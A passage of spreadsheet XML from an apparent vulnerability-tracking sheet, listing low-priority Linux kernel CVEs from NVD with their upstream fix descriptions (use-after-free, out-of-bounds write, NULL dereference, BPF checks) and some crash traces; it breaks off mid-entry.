          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q656" s="5" t="inlineStr"/>
      <c r="R656" s="5" t="inlineStr"/>
      <c r="S656" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
phy: renesas: rcar-gen2: Fix double of_node_put on phy creation failure
for_each_child_of_node_scoped() releases the node reference on scope
exit, so the explicit of_node_put(np) in the devm_phy_create() error
path drops it twice.
Drop the redundant of_node_put() and let the scoped cleanup handle it.</t>
        </is>
      </c>
      <c r="T656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90288</t>
        </is>
      </c>
    </row>
    <row r="657">
      <c r="A657" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B657" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90289</t>
        </is>
      </c>
      <c r="D657" s="5" t="inlineStr"/>
      <c r="E657" s="5" t="inlineStr"/>
      <c r="F657" s="5" t="inlineStr"/>
      <c r="G657" s="5" t="inlineStr"/>
      <c r="H657" s="5" t="inlineStr"/>
      <c r="I657" s="5" t="inlineStr"/>
      <c r="J657" s="5" t="inlineStr"/>
      <c r="K657" s="5" t="inlineStr"/>
      <c r="L657" s="5" t="inlineStr"/>
      <c r="M657" s="5" t="inlineStr"/>
      <c r="N657" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O657" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P657" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q657" s="5" t="inlineStr"/>
      <c r="R657" s="5" t="inlineStr"/>
      <c r="S657" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Resize MST HDCP per-connector arrays to 32
AMDGPU_DM_MAX_DISPLAY_INDEX is 31. It suggest a maximum number of
32 connectors. But the way it's used is like MAX_DISPLAY_COUNT.
Hence we're off by one with DRM core, which supports a max of 32
connectors.
Rename AMDGPU_DM_MAX_DISPLAY_INDEX to AMDGPU_DM_MAX_DISPLAY_COUNT
to match its actual use, and increase the size to 32 to match the
originally intended size.</t>
        </is>
      </c>
      <c r="T657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90289</t>
        </is>
      </c>
    </row>
    <row r="658">
      <c r="A658" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B658" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90290</t>
        </is>
      </c>
      <c r="D658" s="5" t="inlineStr"/>
      <c r="E658" s="5" t="inlineStr"/>
      <c r="F658" s="5" t="inlineStr"/>
      <c r="G658" s="5" t="inlineStr"/>
      <c r="H658" s="5" t="inlineStr"/>
      <c r="I658" s="5" t="inlineStr"/>
      <c r="J658" s="5" t="inlineStr"/>
      <c r="K658" s="5" t="inlineStr"/>
      <c r="L658" s="5" t="inlineStr"/>
      <c r="M658" s="5" t="inlineStr"/>
      <c r="N658" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O658" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P658" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q658" s="5" t="inlineStr"/>
      <c r="R658" s="5" t="inlineStr"/>
      <c r="S658" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
arm64: hibernate: Restore DAIF state on error
Sashiko AI has reported that if swsusp_mte_save_tags() for some reason
fails we return from swsusp_arch_suspend() with DAIF being masked -
that is not what we'd expect. Restore the saved DAIF state before
returning from the error path.</t>
        </is>
      </c>
      <c r="T658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90290</t>
        </is>
      </c>
    </row>
    <row r="659">
      <c r="A659" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B659" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90291</t>
        </is>
      </c>
      <c r="D659" s="5" t="inlineStr"/>
      <c r="E659" s="5" t="inlineStr"/>
      <c r="F659" s="5" t="inlineStr"/>
      <c r="G659" s="5" t="inlineStr"/>
      <c r="H659" s="5" t="inlineStr"/>
      <c r="I659" s="5" t="inlineStr"/>
      <c r="J659" s="5" t="inlineStr"/>
      <c r="K659" s="5" t="inlineStr"/>
      <c r="L659" s="5" t="inlineStr"/>
      <c r="M659" s="5" t="inlineStr"/>
      <c r="N659" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O659" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P659" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q659" s="5" t="inlineStr"/>
      <c r="R659" s="5" t="inlineStr"/>
      <c r="S659" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
module/dups: Fix use-after-free in kmod_dup_req lifetime handling
The kmod dups code uses RCU to ensure that a kmod_dup_req instance is freed
only after it is no longer referenced. When releasing an instance, the
kmod_dup_request_delete() function removes the kmod_dup_req from the
dup_kmod_reqs list, waits via synchronize_rcu() and finally frees it.
However, this doesn't work correctly because parallel users referencing the
instance in kmod_dup_request_exists_wait() don't enter an RCU read-side
critical section. This can result in a use-after-free.
The kmod_dup_request_exists_wait() function may need to hold a valid
reference to a kmod_dup_req instance across a blocking wait until the
corresponding modprobe command completes. This makes it unsuitable for RCU.
Fix the issue by changing the lifecycle management of kmod_dup_req to use
reference counting.</t>
        </is>
      </c>
      <c r="T659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90291</t>
        </is>
      </c>
    </row>
    <row r="660">
      <c r="A660" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B660" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90292</t>
        </is>
      </c>
      <c r="D660" s="5" t="inlineStr"/>
      <c r="E660" s="5" t="inlineStr"/>
      <c r="F660" s="5" t="inlineStr"/>
      <c r="G660" s="5" t="inlineStr"/>
      <c r="H660" s="5" t="inlineStr"/>
      <c r="I660" s="5" t="inlineStr"/>
      <c r="J660" s="5" t="inlineStr"/>
      <c r="K660" s="5" t="inlineStr"/>
      <c r="L660" s="5" t="inlineStr"/>
      <c r="M660" s="5" t="inlineStr"/>
      <c r="N660" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O660" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P660" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q660" s="5" t="inlineStr"/>
      <c r="R660" s="5" t="inlineStr"/>
      <c r="S660" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/siw: Fix use-after-free in siw_accept()
siw_accept() looks up the QP supplied by userspace. If that QP is
already in RTS, the function jumps to error cleanup before associating
the incoming CEP with it.
The cleanup tests whether qp-&gt;cep is non-NULL and assumes the current
call installed the association. However, qp-&gt;cep can point to the CEP
of an existing connection. The cleanup then drops a reference from the
incoming cep, not qp-&gt;cep. Once the incoming endpoint loses its
remaining references, this can free it before the subsequent cep-&gt;qp
store, causing a use-after-free. It also clears the existing QP
association.
Only release the association reference when qp-&gt;cep is the incoming
CEP. This preserves an existing association and avoids accessing the
freed endpoint.</t>
        </is>
      </c>
      <c r="T660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90292</t>
        </is>
      </c>
    </row>
    <row r="661">
      <c r="A661" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B661" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90293</t>
        </is>
      </c>
      <c r="D661" s="5" t="inlineStr"/>
      <c r="E661" s="5" t="inlineStr"/>
      <c r="F661" s="5" t="inlineStr"/>
      <c r="G661" s="5" t="inlineStr"/>
      <c r="H661" s="5" t="inlineStr"/>
      <c r="I661" s="5" t="inlineStr"/>
      <c r="J661" s="5" t="inlineStr"/>
      <c r="K661" s="5" t="inlineStr"/>
      <c r="L661" s="5" t="inlineStr"/>
      <c r="M661" s="5" t="inlineStr"/>
      <c r="N661" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O661" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P661" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q661" s="5" t="inlineStr"/>
      <c r="R661" s="5" t="inlineStr"/>
      <c r="S661" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
IB/isert: post the full-feature receive buffers after session registration
isert_put_login_tx() posts the full-feature receive buffers before
__transport_register_session() runs, so an initiator that does not wait
for the final Login Response can still have a SCSI command executed
against an se_session whose se_tpg is NULL - the same oops as the
previous patch, at target_submit+0xbe.
Post them from isert_get_rx_pdu(), which the previous patch already uses
to send that response, and post them before that send: the receive queue
is filled at the moment the initiator is told it may use it.  Allocating
there keeps the existing property that a memory allocation failure cannot
happen once the final Login Response is on the wire.
The receive queue is already empty between the final Login Request and
isert_post_recvm(); this moves the second point later, from a median of
92 us to 172 us over 1200 logins.  Only an initiator that sends before it
has been told to can reach that window, and on IB and RoCE its send is
retried there until the buffers appear - isert_rdma_accept() asks for
rnr_retry_count = 7.  iWARP has no RNR flow control, so there the same
send terminates the connection instead.
Measured over rxe, 400 login cycles per run, with an initiator that does
not wait: an instrumented build counted no entries to isert_recv_done()
before the buffers are posted in 10 runs, where that initiator oopsed
8 of 10 unpatched runs and 5 of 10 with only the previous patch.
Not tested: iWARP, discovery sessions over iSER, and real HCAs.</t>
        </is>
      </c>
      <c r="T661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90293</t>
        </is>
      </c>
    </row>
    <row r="662">
      <c r="A662" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B662" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90294</t>
        </is>
      </c>
      <c r="D662" s="5" t="inlineStr"/>
      <c r="E662" s="5" t="inlineStr"/>
      <c r="F662" s="5" t="inlineStr"/>
      <c r="G662" s="5" t="inlineStr"/>
      <c r="H662" s="5" t="inlineStr"/>
      <c r="I662" s="5" t="inlineStr"/>
      <c r="J662" s="5" t="inlineStr"/>
      <c r="K662" s="5" t="inlineStr"/>
      <c r="L662" s="5" t="inlineStr"/>
      <c r="M662" s="5" t="inlineStr"/>
      <c r="N662" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O662" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P662" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q662" s="5" t="inlineStr"/>
      <c r="R662" s="5" t="inlineStr"/>
      <c r="S662" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
IB/isert: delay the final Login Response until the session is registered
isert_put_login_tx() puts the final Login Response on the wire before
__transport_register_session(), which iscsi_post_login_handler() reaches
only after iscsi_target_do_login() returns.  An initiator that issues a
SCSI command as soon as it sees that response can have it executed against
an se_session whose se_tpg is still NULL, and the ib-comp-wq worker oopses
on the NULL dereference.
 Oops: general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] SMP KASAN NOPTI
 KASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f]
 CPU: 0 UID: 0 PID: 178 Comm: kworker/0:1H Not tainted 7.2.0-rc5-V2CTL-gf5098b6bae76 #10 PREEMPT(lazy)
 Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
 Workqueue: ib-comp-wq ib_cq_poll_work
 RIP: 0010:target_submit+0xbe/0x390
 Code: fa 48 c1 ea 03 80 3c 02 00 0f 85 89 02 00 00 48 b8 00 00 00 00 00 fc ff df 4d 8b 64 24 18 49 8d 7c 24 78 48 89 fa 48 c1 ea 03 &lt;80&gt; 3c 02 00 0f 85 5a 02 00 00 48 8d 7b 78 4d 8b 6c 24 78 48 b8 00
 RSP: 0018:ffff8881058cfa78 EFLAGS: 00010206
 RAX: dffffc0000000000 RBX: ffff88810c78c6f0 RCX: ffffffff964bb363
 RDX: 000000000000000f RSI: 00000000fffffe00 RDI: 0000000000000078
 RBP: 1ffff11020b19f52 R08: 0000000000000001 R09: ffffed1020b19f52
 R10: 0000000000000003 R11: ffff88810596c000 R12: 0000000000000000
 R13: ffff88810c61b000 R14: ffff88810c6a3400 R15: ffff88810c61b044
 FS:  0000000000000000(0000) GS:ffff8881822b2000(0000) knlGS:0000000000000000
 CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
 CR2: 00007f1f1b83c000 CR3: 000000006fe72001 CR4: 0000000000770ef0
 PKRU: 55555554
 Call Trace:
  &lt;TASK&gt;
  ? __pfx__raw_spin_lock_bh+0x10/0x10
  ? __pfx_target_submit+0x10/0x10
  ? mutex_lock+0x81/0xe0
  ? __pfx_mutex_lock+0x10/0x10
  ? iscsit_execute_cmd+0x650/0x850
  iscsit_sequence_cmd+0x186/0x3d0
  iscsit_process_scsi_cmd+0x87/0x300
  isert_recv_done+0x1002/0x2390
  ? __pfx_isert_recv_done+0x10/0x10
  ? rxe_poll_cq+0x253/0x3d0
  ? finish_task_switch.isra.0+0x1dc/0xa70
  __ib_process_cq+0xe1/0x390
  ib_cq_poll_work+0x46/0x150
  process_one_work+0x633/0x1030
  ? assign_work+0x11d/0x370
  worker_thread+0x45b/0xd10
  ? __pfx_worker_thread+0x10/0x10
  ? __pfx_worker_thread+0x10/0x10
  kthread+0x2c6/0x3b0
  ? recalc_sigpending+0x15c/0x1e0
  ? __pfx_kthread+0x10/0x10
  ret_from_fork+0x36e/0x5a0
  ? __pfx_ret_from_fork+0x10/0x10
  ? __switch_to+0x572/0xdd0
  ? __pfx_kthread+0x10/0x10
  ret_from_fork_asm+0x1a/0x30
  &lt;/TASK&gt;
 Modules linked in:
 ---[ end trace 0000000000000000 ]---
Delay the final Login Response instead.  isert_get_rx_pdu() runs from
iscsi_target_rx_thread() after conn-&gt;rx_login_comp, completed by
iscsi_post_login_handler() after __transport_register_session(); iscsi-TCP
and cxgbit already take PDUs from that thread, isert alone does not.  The
buffers are still posted first, so the initiator's first command does not
meet an empty receive queue and nothing depends on RNR flow control, and
the header and payload live in isert_conn, not in the struct iscsi_login
that iscsi_target_nego_release() frees first.
Over rxe, 400 login cycles per run, the oops appeared in 10 of 20
unpatched runs and in none of 20 runs with this patch.  An
initiator that never waits is handled by the next patch.
Not tested: iWARP, discovery sessions over iSER, and real HCAs.</t>
        </is>
      </c>
      <c r="T662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90294</t>
        </is>
      </c>
    </row>
    <row r="663">
      <c r="A663" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B663" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90295</t>
        </is>
      </c>
      <c r="D663" s="5" t="inlineStr"/>
      <c r="E663" s="5" t="inlineStr"/>
      <c r="F663" s="5" t="inlineStr"/>
      <c r="G663" s="5" t="inlineStr"/>
      <c r="H663" s="5" t="inlineStr"/>
      <c r="I663" s="5" t="inlineStr"/>
      <c r="J663" s="5" t="inlineStr"/>
      <c r="K663" s="5" t="inlineStr"/>
      <c r="L663" s="5" t="inlineStr"/>
      <c r="M663" s="5" t="inlineStr"/>
      <c r="N663" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O663" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P663" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q663" s="5" t="inlineStr"/>
      <c r="R663" s="5" t="inlineStr"/>
      <c r="S663" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq: imx6q: fix out-of-bounds write when probed more than once
imx6_soc_volt is allocated fresh on every probe, sized to the number of
ARM OPPs:
	imx6_soc_volt = devm_kcalloc(cpu_dev, num, sizeof(*imx6_soc_volt),
				     GFP_KERNEL);
but it is filled through soc_opp_count, which has static storage and is
never reset. A second bind after an unbind keeps indexing from where the
first one stopped, and writes past the end of the new array.
Unbinding and rebinding the driver on qemu's mcimx6ul-evk, under KASAN:
  BUG: KASAN: slab-out-of-bounds in imx6q_cpufreq_probe+0x3b0/0xa34
  Write of size 4 at addr c5e90480 by task binder/73
   imx6q_cpufreq_probe from platform_probe+0x88/0xe4
   platform_probe from really_probe+0x108/0x384
   bind_store from kernfs_fop_write_iter+0x1b4/0x28c
The write lands one u32 past the end of the allocation.
soc_opp_count is only read a few lines below the loop that fills it, so it
never needed static storage. Make it a local.</t>
        </is>
      </c>
      <c r="T663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90295</t>
        </is>
      </c>
    </row>
    <row r="664">
      <c r="A664" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B664" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90296</t>
        </is>
      </c>
      <c r="D664" s="5" t="inlineStr"/>
      <c r="E664" s="5" t="inlineStr"/>
      <c r="F664" s="5" t="inlineStr"/>
      <c r="G664" s="5" t="inlineStr"/>
      <c r="H664" s="5" t="inlineStr"/>
      <c r="I664" s="5" t="inlineStr"/>
      <c r="J664" s="5" t="inlineStr"/>
      <c r="K664" s="5" t="inlineStr"/>
      <c r="L664" s="5" t="inlineStr"/>
      <c r="M664" s="5" t="inlineStr"/>
      <c r="N664" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O664" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P664" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q664" s="5" t="inlineStr"/>
      <c r="R664" s="5" t="inlineStr"/>
      <c r="S664" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq: imx6q: fix devres accumulation across driver rebind
imx6_soc_volt is allocated with devm_kcalloc(cpu_dev, ...), where cpu_dev
is the CPU device from get_cpu_device(0). That device is never unbound, so
its devres list is never released, and imx6q_cpufreq_remove() does not free
the array either. Every probe therefore adds an allocation that stays for
the lifetime of the system.
Allocate against the platform device instead. Its devres is released when
the driver is unbound, which is exactly the lifetime the array wants:
imx6q_set_target() reads it, and nothing may reach that after
cpufreq_unregister_driver().
That makes the array actually go away on unbind, so also clear the
file-scope pointer in remove and on the failed-probe path, rather than
leave it pointing at memory devres is about to release.
Tested by rebinding the driver on qemu's mcimx6ul-evk.</t>
        </is>
      </c>
      <c r="T664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90296</t>
        </is>
      </c>
    </row>
    <row r="665">
      <c r="A665" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B665" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90297</t>
        </is>
      </c>
      <c r="D665" s="5" t="inlineStr"/>
      <c r="E665" s="5" t="inlineStr"/>
      <c r="F665" s="5" t="inlineStr"/>
      <c r="G665" s="5" t="inlineStr"/>
      <c r="H665" s="5" t="inlineStr"/>
      <c r="I665" s="5" t="inlineStr"/>
      <c r="J665" s="5" t="inlineStr"/>
      <c r="K665" s="5" t="inlineStr"/>
      <c r="L665" s="5" t="inlineStr"/>
      <c r="M665" s="5" t="inlineStr"/>
      <c r="N665" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O665" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P665" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q665" s="5" t="inlineStr"/>
      <c r="R665" s="5" t="inlineStr"/>
      <c r="S665" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/sun4i: crtc: Propagate layer initialization error
sun4i_crtc_init() returns plain NULL when layer initialization fails,
while all its other error paths return an error pointer. The only
caller, sun4i_tcon_bind(), checks the result with IS_ERR() and happily
continues with tcon-&gt;crtc set to NULL. sun4i_rgb_init() and
sun4i_lvds_init() then dereference it in drm_crtc_mask(), which
oopses.
Return the error pointer instead.</t>
        </is>
      </c>
      <c r="T665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90297</t>
        </is>
      </c>
    </row>
    <row r="666">
      <c r="A666" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B666" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90298</t>
        </is>
      </c>
      <c r="D666" s="5" t="inlineStr"/>
      <c r="E666" s="5" t="inlineStr"/>
      <c r="F666" s="5" t="inlineStr"/>
      <c r="G666" s="5" t="inlineStr"/>
      <c r="H666" s="5" t="inlineStr"/>
      <c r="I666" s="5" t="inlineStr"/>
      <c r="J666" s="5" t="inlineStr"/>
      <c r="K666" s="5" t="inlineStr"/>
      <c r="L666" s="5" t="inlineStr"/>
      <c r="M666" s="5" t="inlineStr"/>
      <c r="N666" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O666" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P666" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q666" s="5" t="inlineStr"/>
      <c r="R666" s="5" t="inlineStr"/>
      <c r="S666" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/sun4i: tcon: Drop TCON TOP device reference
of_find_device_by_node() takes a device reference. Drop it after mux
configuration succeeds.</t>
        </is>
      </c>
      <c r="T666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90298</t>
        </is>
      </c>
    </row>
    <row r="667">
      <c r="A667" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B667" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90299</t>
        </is>
      </c>
      <c r="D667" s="5" t="inlineStr"/>
      <c r="E667" s="5" t="inlineStr"/>
      <c r="F667" s="5" t="inlineStr"/>
      <c r="G667" s="5" t="inlineStr"/>
      <c r="H667" s="5" t="inlineStr"/>
      <c r="I667" s="5" t="inlineStr"/>
      <c r="J667" s="5" t="inlineStr"/>
      <c r="K667" s="5" t="inlineStr"/>
      <c r="L667" s="5" t="inlineStr"/>
      <c r="M667" s="5" t="inlineStr"/>
      <c r="N667" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O667" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P667" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q667" s="5" t="inlineStr"/>
      <c r="R667" s="5" t="inlineStr"/>
      <c r="S667" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix sleepable check for tracing/lsm prog
When CONFIG_FUNCTION_ERROR_INJECTION is disabled, a sleepable tracing prog
is allowed to attach to '__x64_'-alike prefix symbols.
It is because the verifier does not verify whether the symbol is a kernel
function or a bpf prog. That said, a sleepable tracing prog is allowed to
attach to a bpf prog target whose name has '__x64_'-alike prefix.
For example, a sleepable fentry prog attaches to a '__x64_sys_nop' XDP
prog, and copies buffer from a user pointer with bpf_copy_from_user()
helper. After attaching the XDP prog to lo interface, the kernel BUG
could be triggered by 'ping -c 1 -W 1 127.0.0.1':
[    3.460756] BUG: sleeping function called from invalid context at kernel/bpf/trampoline.c:1324
Fix it by disallowing sleepable prog always when its target
btf is not a kernel's btf.</t>
        </is>
      </c>
      <c r="T667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90299</t>
        </is>
      </c>
    </row>
    <row r="668">
      <c r="A668" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B668" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90300</t>
        </is>
      </c>
      <c r="D668" s="5" t="inlineStr"/>
      <c r="E668" s="5" t="inlineStr"/>
      <c r="F668" s="5" t="inlineStr"/>
      <c r="G668" s="5" t="inlineStr"/>
      <c r="H668" s="5" t="inlineStr"/>
      <c r="I668" s="5" t="inlineStr"/>
      <c r="J668" s="5" t="inlineStr"/>
      <c r="K668" s="5" t="inlineStr"/>
      <c r="L668" s="5" t="inlineStr"/>
      <c r="M668" s="5" t="inlineStr"/>
      <c r="N668" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O668" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P668" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q668" s="5" t="inlineStr"/>
      <c r="R668" s="5" t="inlineStr"/>
      <c r="S668" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Clear buf on error in __bpf_get_task_stack
Both bpf_get_task_stack and bpf_get_task_stack_sleepable helpers that
use __bpf_get_task_stack have buf defined as ARG_PTR_TO_UNINIT_MEM
argument and we should initialize the buf on every return path.
Adding missing buf memset for __bpf_get_task_stack fail paths. This
provides deterministic buffer contents, which is useful when the buffer
is used directly as a map key.</t>
        </is>
      </c>
      <c r="T668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90300</t>
        </is>
      </c>
    </row>
    <row r="669">
      <c r="A669" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B669" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90301</t>
        </is>
      </c>
      <c r="D669" s="5" t="inlineStr"/>
      <c r="E669" s="5" t="inlineStr"/>
      <c r="F669" s="5" t="inlineStr"/>
      <c r="G669" s="5" t="inlineStr"/>
      <c r="H669" s="5" t="inlineStr"/>
      <c r="I669" s="5" t="inlineStr"/>
      <c r="J669" s="5" t="inlineStr"/>
      <c r="K669" s="5" t="inlineStr"/>
      <c r="L669" s="5" t="inlineStr"/>
      <c r="M669" s="5" t="inlineStr"/>
      <c r="N669" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O669" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P669" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q669" s="5" t="inlineStr"/>
      <c r="R669" s="5" t="inlineStr"/>
      <c r="S669" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: o2hb: quiesce negotiate handlers and timeout work
Heartbeat regions publish struct o2hb_region as the private data for the
NEGO_TIMEOUT and NEGO_APPROVE o2net handlers as soon as make_item()
creates the configfs region.  The approve handler can call
o2hb_arm_timeout(), so a peer can touch the region timeout work before
dev_store() has finished building the heartbeat runtime, or after teardown
has started to shut that runtime back down.
The final configfs put also has to keep reg alive until the last in-flight
o2net callback drops its handler reference. 
o2net_unregister_handler_list() blocks future handler lookups, but it does
not wait for sc_rx_work that already passed o2net_handler_get().  That
drain needs to cover local listener teardown as well, where the o2net
ordered workqueue may already be inside destroy_workqueue().
Fix the lifetime rule in both directions.  Initialize the region delayed
works before publishing reg through the o2net handler table, keep new or
stopping regions non-armable with hr_stopping, and quiesce both delayed
works on failed-start and teardown paths even when no heartbeat thread is
